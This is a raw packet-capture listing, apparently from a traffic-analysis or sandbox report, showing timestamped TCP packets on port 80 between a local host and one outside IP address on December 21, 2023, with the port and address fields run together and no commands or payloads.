                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054438114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054507971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054579020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054579020 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054639101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054713011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054725885 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054796934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054837942 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054888010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.054996014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055073023 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055077076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055146933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055217981 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055227041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055275917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055342913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055351973 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055408001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055445910 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055476904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055579901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055661917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055721045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055727959 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055764914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055795908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055844069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055902004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.055932045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056070089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056129932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056154966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056255102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056297064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056322098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056364059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056400061 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056406975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056490898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056509018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056574106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056602001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056654930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056689024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056847095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056905985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056940079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.056993961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057074070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057080984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057173014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057190895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057226896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057274103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057312012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057320118 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057363033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057399035 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057446957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057466030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057507992 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057516098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057576895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057615042 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057641029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057701111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057749033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057751894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057809114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057867050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057919025 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.057979107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.058034897 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.058048010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.058135033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.058295012 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.058897018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.058979034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059036970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059086084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059160948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059216976 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059262037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059305906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059382915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059402943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059472084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059531927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059562922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059653044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059711933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059731007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059781075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059823036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.059914112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060005903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060075998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060149908 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060165882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060235977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060251951 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060316086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060355902 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060419083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060503006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060548067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060619116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060703039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060753107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060787916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060859919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060910940 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.060956001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061021090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061108112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061119080 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061178923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061224937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061266899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061414957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061495066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061564922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061630964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061672926 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061727047 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061789989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061836004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061881065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.061952114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062005997 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062041044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062117100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062186003 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062216043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062273979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062352896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062465906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062550068 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062606096 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062764883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062864065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062915087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.062938929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063000917 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063039064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063039064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063150883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063194990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063257933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063257933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063311100 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063365936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063380957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063424110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063448906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063497066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063534021 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063587904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063704967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063775063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063805103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063822985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063863993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063889027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.063947916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064028025 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064040899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064137936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064198971 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064253092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064383984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064430952 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064560890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064771891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064860106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.064939976 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065031052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065076113 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065107107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065196991 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065274000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065296888 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065341949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065433025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065478086 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065646887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065745115 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065759897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065829039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.065874100 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066020012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066123962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066168070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066394091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066528082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066629887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066633940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066716909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066807985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066814899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066891909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066926956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.066935062 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067001104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067043066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067121983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067200899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067235947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067250013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067303896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067367077 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067483902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067522049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067567110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067631960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067718983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067795038 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.067920923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068049908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068113089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068176985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068315983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068356037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068520069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068665981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068706036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068770885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068862915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068917036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.068991899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069112062 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069175959 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069274902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069354057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069366932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069412947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069472075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069518089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069549084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069607019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069667101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069760084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.069947958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070000887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070024014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070077896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070127010 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070154905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070183039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070240974 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070245028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.070370913 CET804973891.215.85.17192.168.2.4
